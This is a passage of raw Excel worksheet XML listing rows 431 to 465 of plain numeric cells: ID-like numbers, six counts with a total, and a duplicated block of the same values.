      <c r="F431" s="8">
        <v>23</v>
      </c>
      <c r="G431" s="8">
        <v>34</v>
      </c>
      <c r="H431" s="8">
        <v>234</v>
      </c>
      <c r="K431" s="7">
        <v>1087</v>
      </c>
      <c r="L431" s="8">
        <v>26</v>
      </c>
      <c r="M431" s="8">
        <v>1</v>
      </c>
      <c r="N431" s="8">
        <v>45</v>
      </c>
      <c r="O431" s="8">
        <v>105</v>
      </c>
      <c r="P431" s="8">
        <v>23</v>
      </c>
      <c r="Q431" s="8">
        <v>34</v>
      </c>
    </row>
    <row r="432" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A432" s="7">
        <v>1092</v>
      </c>
      <c r="B432" s="8">
        <v>25</v>
      </c>
      <c r="C432" s="8">
        <v>1</v>
      </c>
      <c r="D432" s="8">
        <v>10</v>
      </c>
      <c r="E432" s="8">
        <v>0</v>
      </c>
      <c r="F432" s="8">
        <v>5</v>
      </c>
      <c r="G432" s="8">
        <v>3</v>
      </c>
      <c r="H432" s="8">
        <v>44</v>
      </c>
      <c r="K432" s="7">
        <v>1092</v>
      </c>
      <c r="L432" s="8">
        <v>25</v>
      </c>
      <c r="M432" s="8">
        <v>1</v>
      </c>
      <c r="N432" s="8">
        <v>10</v>
      </c>
      <c r="O432" s="8">
        <v>0</v>
      </c>
      <c r="P432" s="8">
        <v>5</v>
      </c>
      <c r="Q432" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="433" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A433" s="7">
        <v>1096</v>
      </c>
      <c r="B433" s="8">
        <v>26</v>
      </c>
      <c r="C433" s="8">
        <v>1</v>
      </c>
      <c r="D433" s="8">
        <v>5</v>
      </c>
      <c r="E433" s="8">
        <v>0</v>
      </c>
      <c r="F433" s="8">
        <v>14</v>
      </c>
      <c r="G433" s="8">
        <v>10</v>
      </c>
      <c r="H433" s="8">
        <v>56</v>
      </c>
      <c r="K433" s="7">
        <v>1096</v>
      </c>
      <c r="L433" s="8">
        <v>26</v>
      </c>
      <c r="M433" s="8">
        <v>1</v>
      </c>
      <c r="N433" s="8">
        <v>5</v>
      </c>
      <c r="O433" s="8">
        <v>0</v>
      </c>
      <c r="P433" s="8">
        <v>14</v>
      </c>
      <c r="Q433" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="434" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A434" s="7">
        <v>1097</v>
      </c>
      <c r="B434" s="8">
        <v>25</v>
      </c>
      <c r="C434" s="8">
        <v>1</v>
      </c>
      <c r="D434" s="8">
        <v>28</v>
      </c>
      <c r="E434" s="8">
        <v>16</v>
      </c>
      <c r="F434" s="8">
        <v>10</v>
      </c>
      <c r="G434" s="8">
        <v>3</v>
      </c>
      <c r="H434" s="8">
        <v>83</v>
      </c>
      <c r="K434" s="7">
        <v>1097</v>
      </c>
      <c r="L434" s="8">
        <v>25</v>
      </c>
      <c r="M434" s="8">
        <v>1</v>
      </c>
      <c r="N434" s="8">
        <v>28</v>
      </c>
      <c r="O434" s="8">
        <v>16</v>
      </c>
      <c r="P434" s="8">
        <v>10</v>
      </c>
      <c r="Q434" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="435" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A435" s="7">
        <v>1098</v>
      </c>
      <c r="B435" s="8">
        <v>6</v>
      </c>
      <c r="C435" s="8">
        <v>0</v>
      </c>
      <c r="D435" s="8">
        <v>31</v>
      </c>
      <c r="E435" s="8">
        <v>55</v>
      </c>
      <c r="F435" s="8">
        <v>6</v>
      </c>
      <c r="G435" s="8">
        <v>0</v>
      </c>
      <c r="H435" s="8">
        <v>98</v>
      </c>
      <c r="K435" s="7">
        <v>1098</v>
      </c>
      <c r="L435" s="8">
        <v>6</v>
      </c>
      <c r="M435" s="8">
        <v>0</v>
      </c>
      <c r="N435" s="8">
        <v>31</v>
      </c>
      <c r="O435" s="8">
        <v>55</v>
      </c>
      <c r="P435" s="8">
        <v>6</v>
      </c>
      <c r="Q435" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="436" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A436" s="7">
        <v>1102</v>
      </c>
      <c r="B436" s="8">
        <v>7</v>
      </c>
      <c r="C436" s="8">
        <v>0</v>
      </c>
      <c r="D436" s="8">
        <v>20</v>
      </c>
      <c r="E436" s="8">
        <v>5</v>
      </c>
      <c r="F436" s="8">
        <v>4</v>
      </c>
      <c r="G436" s="8">
        <v>5</v>
      </c>
      <c r="H436" s="8">
        <v>41</v>
      </c>
      <c r="K436" s="7">
        <v>1102</v>
      </c>
      <c r="L436" s="8">
        <v>7</v>
      </c>
      <c r="M436" s="8">
        <v>0</v>
      </c>
      <c r="N436" s="8">
        <v>20</v>
      </c>
      <c r="O436" s="8">
        <v>5</v>
      </c>
      <c r="P436" s="8">
        <v>4</v>
      </c>
      <c r="Q436" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="437" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A437" s="7">
        <v>1107</v>
      </c>
      <c r="B437" s="8">
        <v>30</v>
      </c>
      <c r="C437" s="8">
        <v>3</v>
      </c>
      <c r="D437" s="8">
        <v>45</v>
      </c>
      <c r="E437" s="8">
        <v>20</v>
      </c>
      <c r="F437" s="8">
        <v>65</v>
      </c>
      <c r="G437" s="8">
        <v>40</v>
      </c>
      <c r="H437" s="8">
        <v>203</v>
      </c>
      <c r="K437" s="7">
        <v>1107</v>
      </c>
      <c r="L437" s="8">
        <v>30</v>
      </c>
      <c r="M437" s="8">
        <v>3</v>
      </c>
      <c r="N437" s="8">
        <v>45</v>
      </c>
      <c r="O437" s="8">
        <v>20</v>
      </c>
      <c r="P437" s="8">
        <v>65</v>
      </c>
      <c r="Q437" s="8">
        <v>40</v>
      </c>
    </row>
    <row r="438" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A438" s="7">
        <v>1113</v>
      </c>
      <c r="B438" s="8">
        <v>0</v>
      </c>
      <c r="C438" s="8">
        <v>0</v>
      </c>
      <c r="D438" s="8">
        <v>3</v>
      </c>
      <c r="E438" s="8">
        <v>30</v>
      </c>
      <c r="F438" s="8">
        <v>3</v>
      </c>
      <c r="G438" s="8">
        <v>1</v>
      </c>
      <c r="H438" s="8">
        <v>37</v>
      </c>
      <c r="K438" s="7">
        <v>1113</v>
      </c>
      <c r="L438" s="8">
        <v>0</v>
      </c>
      <c r="M438" s="8">
        <v>0</v>
      </c>
      <c r="N438" s="8">
        <v>3</v>
      </c>
      <c r="O438" s="8">
        <v>30</v>
      </c>
      <c r="P438" s="8">
        <v>3</v>
      </c>
      <c r="Q438" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="439" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A439" s="7">
        <v>1116</v>
      </c>
      <c r="B439" s="8">
        <v>26</v>
      </c>
      <c r="C439" s="8">
        <v>1</v>
      </c>
      <c r="D439" s="8">
        <v>0</v>
      </c>
      <c r="E439" s="8">
        <v>10</v>
      </c>
      <c r="F439" s="8">
        <v>7</v>
      </c>
      <c r="G439" s="8">
        <v>9</v>
      </c>
      <c r="H439" s="8">
        <v>53</v>
      </c>
      <c r="K439" s="7">
        <v>1116</v>
      </c>
      <c r="L439" s="8">
        <v>26</v>
      </c>
      <c r="M439" s="8">
        <v>1</v>
      </c>
      <c r="N439" s="8">
        <v>0</v>
      </c>
      <c r="O439" s="8">
        <v>10</v>
      </c>
      <c r="P439" s="8">
        <v>7</v>
      </c>
      <c r="Q439" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="440" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A440" s="7">
        <v>1117</v>
      </c>
      <c r="B440" s="8">
        <v>26</v>
      </c>
      <c r="C440" s="8">
        <v>1</v>
      </c>
      <c r="D440" s="8">
        <v>0</v>
      </c>
      <c r="E440" s="8">
        <v>0</v>
      </c>
      <c r="F440" s="8">
        <v>6</v>
      </c>
      <c r="G440" s="8">
        <v>2</v>
      </c>
      <c r="H440" s="8">
        <v>35</v>
      </c>
      <c r="K440" s="7">
        <v>1117</v>
      </c>
      <c r="L440" s="8">
        <v>26</v>
      </c>
      <c r="M440" s="8">
        <v>1</v>
      </c>
      <c r="N440" s="8">
        <v>0</v>
      </c>
      <c r="O440" s="8">
        <v>0</v>
      </c>
      <c r="P440" s="8">
        <v>6</v>
      </c>
      <c r="Q440" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="441" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A441" s="7">
        <v>1120</v>
      </c>
      <c r="B441" s="8">
        <v>26</v>
      </c>
      <c r="C441" s="8">
        <v>1</v>
      </c>
      <c r="D441" s="8">
        <v>10</v>
      </c>
      <c r="E441" s="8">
        <v>5</v>
      </c>
      <c r="F441" s="8">
        <v>6</v>
      </c>
      <c r="G441" s="8">
        <v>4</v>
      </c>
      <c r="H441" s="8">
        <v>52</v>
      </c>
      <c r="K441" s="7">
        <v>1120</v>
      </c>
      <c r="L441" s="8">
        <v>26</v>
      </c>
      <c r="M441" s="8">
        <v>1</v>
      </c>
      <c r="N441" s="8">
        <v>10</v>
      </c>
      <c r="O441" s="8">
        <v>5</v>
      </c>
      <c r="P441" s="8">
        <v>6</v>
      </c>
      <c r="Q441" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="442" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A442" s="7">
        <v>1123</v>
      </c>
      <c r="B442" s="8">
        <v>21</v>
      </c>
      <c r="C442" s="8">
        <v>1</v>
      </c>
      <c r="D442" s="8">
        <v>0</v>
      </c>
      <c r="E442" s="8">
        <v>0</v>
      </c>
      <c r="F442" s="8">
        <v>100</v>
      </c>
      <c r="G442" s="8">
        <v>52</v>
      </c>
      <c r="H442" s="8">
        <v>174</v>
      </c>
      <c r="K442" s="7">
        <v>1123</v>
      </c>
      <c r="L442" s="8">
        <v>21</v>
      </c>
      <c r="M442" s="8">
        <v>1</v>
      </c>
      <c r="N442" s="8">
        <v>0</v>
      </c>
      <c r="O442" s="8">
        <v>0</v>
      </c>
      <c r="P442" s="8">
        <v>100</v>
      </c>
      <c r="Q442" s="8">
        <v>52</v>
      </c>
    </row>
    <row r="443" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A443" s="7">
        <v>1124</v>
      </c>
      <c r="B443" s="8">
        <v>309</v>
      </c>
      <c r="C443" s="8">
        <v>1</v>
      </c>
      <c r="D443" s="8">
        <v>6</v>
      </c>
      <c r="E443" s="8">
        <v>25</v>
      </c>
      <c r="F443" s="8">
        <v>2</v>
      </c>
      <c r="G443" s="8">
        <v>0</v>
      </c>
      <c r="H443" s="8">
        <v>343</v>
      </c>
      <c r="K443" s="7">
        <v>1124</v>
      </c>
      <c r="L443" s="8">
        <v>309</v>
      </c>
      <c r="M443" s="8">
        <v>1</v>
      </c>
      <c r="N443" s="8">
        <v>6</v>
      </c>
      <c r="O443" s="8">
        <v>25</v>
      </c>
      <c r="P443" s="8">
        <v>2</v>
      </c>
      <c r="Q443" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="444" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A444" s="7">
        <v>1125</v>
      </c>
      <c r="B444" s="8">
        <v>0</v>
      </c>
      <c r="C444" s="8">
        <v>0</v>
      </c>
      <c r="D444" s="8">
        <v>5</v>
      </c>
      <c r="E444" s="8">
        <v>0</v>
      </c>
      <c r="F444" s="8">
        <v>19</v>
      </c>
      <c r="G444" s="8">
        <v>4</v>
      </c>
      <c r="H444" s="8">
        <v>28</v>
      </c>
      <c r="K444" s="7">
        <v>1125</v>
      </c>
      <c r="L444" s="8">
        <v>0</v>
      </c>
      <c r="M444" s="8">
        <v>0</v>
      </c>
      <c r="N444" s="8">
        <v>5</v>
      </c>
      <c r="O444" s="8">
        <v>0</v>
      </c>
      <c r="P444" s="8">
        <v>19</v>
      </c>
      <c r="Q444" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="445" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A445" s="7">
        <v>1126</v>
      </c>
      <c r="B445" s="8">
        <v>25</v>
      </c>
      <c r="C445" s="8">
        <v>1</v>
      </c>
      <c r="D445" s="8">
        <v>7</v>
      </c>
      <c r="E445" s="8">
        <v>13</v>
      </c>
      <c r="F445" s="8">
        <v>3</v>
      </c>
      <c r="G445" s="8">
        <v>3</v>
      </c>
      <c r="H445" s="8">
        <v>52</v>
      </c>
      <c r="K445" s="7">
        <v>1126</v>
      </c>
      <c r="L445" s="8">
        <v>25</v>
      </c>
      <c r="M445" s="8">
        <v>1</v>
      </c>
      <c r="N445" s="8">
        <v>7</v>
      </c>
      <c r="O445" s="8">
        <v>13</v>
      </c>
      <c r="P445" s="8">
        <v>3</v>
      </c>
      <c r="Q445" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="446" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A446" s="7">
        <v>1127</v>
      </c>
      <c r="B446" s="8">
        <v>26</v>
      </c>
      <c r="C446" s="8">
        <v>1</v>
      </c>
      <c r="D446" s="8">
        <v>48</v>
      </c>
      <c r="E446" s="8">
        <v>4</v>
      </c>
      <c r="F446" s="8">
        <v>25</v>
      </c>
      <c r="G446" s="8">
        <v>10</v>
      </c>
      <c r="H446" s="8">
        <v>114</v>
      </c>
      <c r="K446" s="7">
        <v>1127</v>
      </c>
      <c r="L446" s="8">
        <v>26</v>
      </c>
      <c r="M446" s="8">
        <v>1</v>
      </c>
      <c r="N446" s="8">
        <v>48</v>
      </c>
      <c r="O446" s="8">
        <v>4</v>
      </c>
      <c r="P446" s="8">
        <v>25</v>
      </c>
      <c r="Q446" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="447" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A447" s="7">
        <v>1129</v>
      </c>
      <c r="B447" s="8">
        <v>26</v>
      </c>
      <c r="C447" s="8">
        <v>1</v>
      </c>
      <c r="D447" s="8">
        <v>0</v>
      </c>
      <c r="E447" s="8">
        <v>0</v>
      </c>
      <c r="F447" s="8">
        <v>49</v>
      </c>
      <c r="G447" s="8">
        <v>36</v>
      </c>
      <c r="H447" s="8">
        <v>112</v>
      </c>
      <c r="K447" s="7">
        <v>1129</v>
      </c>
      <c r="L447" s="8">
        <v>26</v>
      </c>
      <c r="M447" s="8">
        <v>1</v>
      </c>
      <c r="N447" s="8">
        <v>0</v>
      </c>
      <c r="O447" s="8">
        <v>0</v>
      </c>
      <c r="P447" s="8">
        <v>49</v>
      </c>
      <c r="Q447" s="8">
        <v>36</v>
      </c>
    </row>
    <row r="448" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A448" s="7">
        <v>1130</v>
      </c>
      <c r="B448" s="8">
        <v>30</v>
      </c>
      <c r="C448" s="8">
        <v>0</v>
      </c>
      <c r="D448" s="8">
        <v>0</v>
      </c>
      <c r="E448" s="8">
        <v>30</v>
      </c>
      <c r="F448" s="8">
        <v>25</v>
      </c>
      <c r="G448" s="8">
        <v>65</v>
      </c>
      <c r="H448" s="8">
        <v>150</v>
      </c>
      <c r="K448" s="7">
        <v>1130</v>
      </c>
      <c r="L448" s="8">
        <v>30</v>
      </c>
      <c r="M448" s="8">
        <v>0</v>
      </c>
      <c r="N448" s="8">
        <v>0</v>
      </c>
      <c r="O448" s="8">
        <v>30</v>
      </c>
      <c r="P448" s="8">
        <v>25</v>
      </c>
      <c r="Q448" s="8">
        <v>65</v>
      </c>
    </row>
    <row r="449" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A449" s="7">
        <v>1131</v>
      </c>
      <c r="B449" s="8">
        <v>30</v>
      </c>
      <c r="C449" s="8">
        <v>0</v>
      </c>
      <c r="D449" s="8">
        <v>8</v>
      </c>
      <c r="E449" s="8">
        <v>10</v>
      </c>
      <c r="F449" s="8">
        <v>7</v>
      </c>
      <c r="G449" s="8">
        <v>7</v>
      </c>
      <c r="H449" s="8">
        <v>62</v>
      </c>
      <c r="K449" s="7">
        <v>1131</v>
      </c>
      <c r="L449" s="8">
        <v>30</v>
      </c>
      <c r="M449" s="8">
        <v>0</v>
      </c>
      <c r="N449" s="8">
        <v>8</v>
      </c>
      <c r="O449" s="8">
        <v>10</v>
      </c>
      <c r="P449" s="8">
        <v>7</v>
      </c>
      <c r="Q449" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="450" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A450" s="7">
        <v>1132</v>
      </c>
      <c r="B450" s="8">
        <v>25</v>
      </c>
      <c r="C450" s="8">
        <v>1</v>
      </c>
      <c r="D450" s="8">
        <v>118</v>
      </c>
      <c r="E450" s="8">
        <v>99</v>
      </c>
      <c r="F450" s="8">
        <v>128</v>
      </c>
      <c r="G450" s="8">
        <v>55</v>
      </c>
      <c r="H450" s="8">
        <v>426</v>
      </c>
      <c r="K450" s="7">
        <v>1132</v>
      </c>
      <c r="L450" s="8">
        <v>25</v>
      </c>
      <c r="M450" s="8">
        <v>1</v>
      </c>
      <c r="N450" s="8">
        <v>118</v>
      </c>
      <c r="O450" s="8">
        <v>99</v>
      </c>
      <c r="P450" s="8">
        <v>128</v>
      </c>
      <c r="Q450" s="8">
        <v>55</v>
      </c>
    </row>
    <row r="451" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A451" s="7">
        <v>1134</v>
      </c>
      <c r="B451" s="8">
        <v>30</v>
      </c>
      <c r="C451" s="8">
        <v>1</v>
      </c>
      <c r="D451" s="8">
        <v>8</v>
      </c>
      <c r="E451" s="8">
        <v>12</v>
      </c>
      <c r="F451" s="8">
        <v>4</v>
      </c>
      <c r="G451" s="8">
        <v>4</v>
      </c>
      <c r="H451" s="8">
        <v>59</v>
      </c>
      <c r="K451" s="7">
        <v>1134</v>
      </c>
      <c r="L451" s="8">
        <v>30</v>
      </c>
      <c r="M451" s="8">
        <v>1</v>
      </c>
      <c r="N451" s="8">
        <v>8</v>
      </c>
      <c r="O451" s="8">
        <v>12</v>
      </c>
      <c r="P451" s="8">
        <v>4</v>
      </c>
      <c r="Q451" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="452" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A452" s="7">
        <v>1141</v>
      </c>
      <c r="B452" s="8">
        <v>30</v>
      </c>
      <c r="C452" s="8">
        <v>3</v>
      </c>
      <c r="D452" s="8">
        <v>55</v>
      </c>
      <c r="E452" s="8">
        <v>45</v>
      </c>
      <c r="F452" s="8">
        <v>9</v>
      </c>
      <c r="G452" s="8">
        <v>4</v>
      </c>
      <c r="H452" s="8">
        <v>146</v>
      </c>
      <c r="K452" s="7">
        <v>1141</v>
      </c>
      <c r="L452" s="8">
        <v>30</v>
      </c>
      <c r="M452" s="8">
        <v>3</v>
      </c>
      <c r="N452" s="8">
        <v>55</v>
      </c>
      <c r="O452" s="8">
        <v>45</v>
      </c>
      <c r="P452" s="8">
        <v>9</v>
      </c>
      <c r="Q452" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="453" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A453" s="7">
        <v>1142</v>
      </c>
      <c r="B453" s="8">
        <v>6</v>
      </c>
      <c r="C453" s="8">
        <v>0</v>
      </c>
      <c r="D453" s="8">
        <v>8</v>
      </c>
      <c r="E453" s="8">
        <v>8</v>
      </c>
      <c r="F453" s="8">
        <v>1</v>
      </c>
      <c r="G453" s="8">
        <v>5</v>
      </c>
      <c r="H453" s="8">
        <v>28</v>
      </c>
      <c r="K453" s="7">
        <v>1142</v>
      </c>
      <c r="L453" s="8">
        <v>6</v>
      </c>
      <c r="M453" s="8">
        <v>0</v>
      </c>
      <c r="N453" s="8">
        <v>8</v>
      </c>
      <c r="O453" s="8">
        <v>8</v>
      </c>
      <c r="P453" s="8">
        <v>1</v>
      </c>
      <c r="Q453" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="454" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A454" s="7">
        <v>1143</v>
      </c>
      <c r="B454" s="8">
        <v>5</v>
      </c>
      <c r="C454" s="8">
        <v>0</v>
      </c>
      <c r="D454" s="8">
        <v>1</v>
      </c>
      <c r="E454" s="8">
        <v>0</v>
      </c>
      <c r="F454" s="8">
        <v>1</v>
      </c>
      <c r="G454" s="8">
        <v>1</v>
      </c>
      <c r="H454" s="8">
        <v>8</v>
      </c>
      <c r="K454" s="7">
        <v>1143</v>
      </c>
      <c r="L454" s="8">
        <v>5</v>
      </c>
      <c r="M454" s="8">
        <v>0</v>
      </c>
      <c r="N454" s="8">
        <v>1</v>
      </c>
      <c r="O454" s="8">
        <v>0</v>
      </c>
      <c r="P454" s="8">
        <v>1</v>
      </c>
      <c r="Q454" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="455" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A455" s="7">
        <v>1144</v>
      </c>
      <c r="B455" s="8">
        <v>57</v>
      </c>
      <c r="C455" s="8">
        <v>1</v>
      </c>
      <c r="D455" s="8">
        <v>19</v>
      </c>
      <c r="E455" s="8">
        <v>30</v>
      </c>
      <c r="F455" s="8">
        <v>4</v>
      </c>
      <c r="G455" s="8">
        <v>4</v>
      </c>
      <c r="H455" s="8">
        <v>115</v>
      </c>
      <c r="K455" s="7">
        <v>1144</v>
      </c>
      <c r="L455" s="8">
        <v>57</v>
      </c>
      <c r="M455" s="8">
        <v>1</v>
      </c>
      <c r="N455" s="8">
        <v>19</v>
      </c>
      <c r="O455" s="8">
        <v>30</v>
      </c>
      <c r="P455" s="8">
        <v>4</v>
      </c>
      <c r="Q455" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="456" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A456" s="7">
        <v>1149</v>
      </c>
      <c r="B456" s="8">
        <v>25</v>
      </c>
      <c r="C456" s="8">
        <v>0</v>
      </c>
      <c r="D456" s="8">
        <v>0</v>
      </c>
      <c r="E456" s="8">
        <v>0</v>
      </c>
      <c r="F456" s="8">
        <v>240</v>
      </c>
      <c r="G456" s="8">
        <v>101</v>
      </c>
      <c r="H456" s="8">
        <v>366</v>
      </c>
      <c r="K456" s="7">
        <v>1149</v>
      </c>
      <c r="L456" s="8">
        <v>25</v>
      </c>
      <c r="M456" s="8">
        <v>0</v>
      </c>
      <c r="N456" s="8">
        <v>0</v>
      </c>
      <c r="O456" s="8">
        <v>0</v>
      </c>
      <c r="P456" s="8">
        <v>240</v>
      </c>
      <c r="Q456" s="8">
        <v>101</v>
      </c>
    </row>
    <row r="457" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A457" s="7">
        <v>1155</v>
      </c>
      <c r="B457" s="8">
        <v>25</v>
      </c>
      <c r="C457" s="8">
        <v>2</v>
      </c>
      <c r="D457" s="8">
        <v>18</v>
      </c>
      <c r="E457" s="8">
        <v>519</v>
      </c>
      <c r="F457" s="8">
        <v>59</v>
      </c>
      <c r="G457" s="8">
        <v>57</v>
      </c>
      <c r="H457" s="8">
        <v>680</v>
      </c>
      <c r="K457" s="7">
        <v>1155</v>
      </c>
      <c r="L457" s="8">
        <v>25</v>
      </c>
      <c r="M457" s="8">
        <v>2</v>
      </c>
      <c r="N457" s="8">
        <v>18</v>
      </c>
      <c r="O457" s="8">
        <v>519</v>
      </c>
      <c r="P457" s="8">
        <v>59</v>
      </c>
      <c r="Q457" s="8">
        <v>57</v>
      </c>
    </row>
    <row r="458" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A458" s="7">
        <v>1156</v>
      </c>
      <c r="B458" s="8">
        <v>6</v>
      </c>
      <c r="C458" s="8">
        <v>2</v>
      </c>
      <c r="D458" s="8">
        <v>88</v>
      </c>
      <c r="E458" s="8">
        <v>479</v>
      </c>
      <c r="F458" s="8">
        <v>56</v>
      </c>
      <c r="G458" s="8">
        <v>51</v>
      </c>
      <c r="H458" s="8">
        <v>682</v>
      </c>
      <c r="K458" s="7">
        <v>1156</v>
      </c>
      <c r="L458" s="8">
        <v>6</v>
      </c>
      <c r="M458" s="8">
        <v>2</v>
      </c>
      <c r="N458" s="8">
        <v>88</v>
      </c>
      <c r="O458" s="8">
        <v>479</v>
      </c>
      <c r="P458" s="8">
        <v>56</v>
      </c>
      <c r="Q458" s="8">
        <v>51</v>
      </c>
    </row>
    <row r="459" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A459" s="7">
        <v>1157</v>
      </c>
      <c r="B459" s="8">
        <v>6</v>
      </c>
      <c r="C459" s="8">
        <v>0</v>
      </c>
      <c r="D459" s="8">
        <v>2</v>
      </c>
      <c r="E459" s="8">
        <v>0</v>
      </c>
      <c r="F459" s="8">
        <v>7</v>
      </c>
      <c r="G459" s="8">
        <v>5</v>
      </c>
      <c r="H459" s="8">
        <v>20</v>
      </c>
      <c r="K459" s="7">
        <v>1157</v>
      </c>
      <c r="L459" s="8">
        <v>6</v>
      </c>
      <c r="M459" s="8">
        <v>0</v>
      </c>
      <c r="N459" s="8">
        <v>2</v>
      </c>
      <c r="O459" s="8">
        <v>0</v>
      </c>
      <c r="P459" s="8">
        <v>7</v>
      </c>
      <c r="Q459" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="460" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A460" s="7">
        <v>1159</v>
      </c>
      <c r="B460" s="8">
        <v>25</v>
      </c>
      <c r="C460" s="8">
        <v>3</v>
      </c>
      <c r="D460" s="8">
        <v>17</v>
      </c>
      <c r="E460" s="8">
        <v>144</v>
      </c>
      <c r="F460" s="8">
        <v>11</v>
      </c>
      <c r="G460" s="8">
        <v>17</v>
      </c>
      <c r="H460" s="8">
        <v>217</v>
      </c>
      <c r="K460" s="7">
        <v>1159</v>
      </c>
      <c r="L460" s="8">
        <v>25</v>
      </c>
      <c r="M460" s="8">
        <v>3</v>
      </c>
      <c r="N460" s="8">
        <v>17</v>
      </c>
      <c r="O460" s="8">
        <v>144</v>
      </c>
      <c r="P460" s="8">
        <v>11</v>
      </c>
      <c r="Q460" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="461" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A461" s="7">
        <v>1160</v>
      </c>
      <c r="B461" s="8">
        <v>25</v>
      </c>
      <c r="C461" s="8">
        <v>1</v>
      </c>
      <c r="D461" s="8">
        <v>55</v>
      </c>
      <c r="E461" s="8">
        <v>77</v>
      </c>
      <c r="F461" s="8">
        <v>15</v>
      </c>
      <c r="G461" s="8">
        <v>11</v>
      </c>
      <c r="H461" s="8">
        <v>184</v>
      </c>
      <c r="K461" s="7">
        <v>1160</v>
      </c>
      <c r="L461" s="8">
        <v>25</v>
      </c>
      <c r="M461" s="8">
        <v>1</v>
      </c>
      <c r="N461" s="8">
        <v>55</v>
      </c>
      <c r="O461" s="8">
        <v>77</v>
      </c>
      <c r="P461" s="8">
        <v>15</v>
      </c>
      <c r="Q461" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="462" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A462" s="7">
        <v>1161</v>
      </c>
      <c r="B462" s="8">
        <v>26</v>
      </c>
      <c r="C462" s="8">
        <v>1</v>
      </c>
      <c r="D462" s="8">
        <v>10</v>
      </c>
      <c r="E462" s="8">
        <v>2</v>
      </c>
      <c r="F462" s="8">
        <v>12</v>
      </c>
      <c r="G462" s="8">
        <v>8</v>
      </c>
      <c r="H462" s="8">
        <v>59</v>
      </c>
      <c r="K462" s="7">
        <v>1161</v>
      </c>
      <c r="L462" s="8">
        <v>26</v>
      </c>
      <c r="M462" s="8">
        <v>1</v>
      </c>
      <c r="N462" s="8">
        <v>10</v>
      </c>
      <c r="O462" s="8">
        <v>2</v>
      </c>
      <c r="P462" s="8">
        <v>12</v>
      </c>
      <c r="Q462" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="463" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A463" s="7">
        <v>1162</v>
      </c>
      <c r="B463" s="8">
        <v>30</v>
      </c>
      <c r="C463" s="8">
        <v>1</v>
      </c>
      <c r="D463" s="8">
        <v>80</v>
      </c>
      <c r="E463" s="8">
        <v>645</v>
      </c>
      <c r="F463" s="8">
        <v>8</v>
      </c>
      <c r="G463" s="8">
        <v>23</v>
      </c>
      <c r="H463" s="8">
        <v>787</v>
      </c>
      <c r="K463" s="7">
        <v>1162</v>
      </c>
      <c r="L463" s="8">
        <v>30</v>
      </c>
      <c r="M463" s="8">
        <v>1</v>
      </c>
      <c r="N463" s="8">
        <v>80</v>
      </c>
      <c r="O463" s="8">
        <v>645</v>
      </c>
      <c r="P463" s="8">
        <v>8</v>
      </c>
      <c r="Q463" s="8">
        <v>23</v>
      </c>
    </row>
    <row r="464" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A464" s="7">
        <v>1165</v>
      </c>
      <c r="B464" s="8">
        <v>25</v>
      </c>
      <c r="C464" s="8">
        <v>1</v>
      </c>
      <c r="D464" s="8">
        <v>0</v>
      </c>
      <c r="E464" s="8">
        <v>0</v>
      </c>
      <c r="F464" s="8">
        <v>155</v>
      </c>
      <c r="G464" s="8">
        <v>462</v>
      </c>
      <c r="H464" s="8">
        <v>643</v>
      </c>
      <c r="K464" s="7">
        <v>1165</v>
      </c>
      <c r="L464" s="8">
        <v>25</v>
      </c>
      <c r="M464" s="8">
        <v>1</v>
      </c>
      <c r="N464" s="8">
        <v>0</v>
      </c>
      <c r="O464" s="8">
        <v>0</v>
      </c>
      <c r="P464" s="8">
        <v>155</v>
      </c>
      <c r="Q464" s="8">
        <v>462</v>
      </c>
    </row>
    <row r="465" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A465" s="7">
        <v>1166</v>
      </c>
      <c r="B465" s="8">
        <v>25</v>
      </c>
      <c r="C465" s="8">
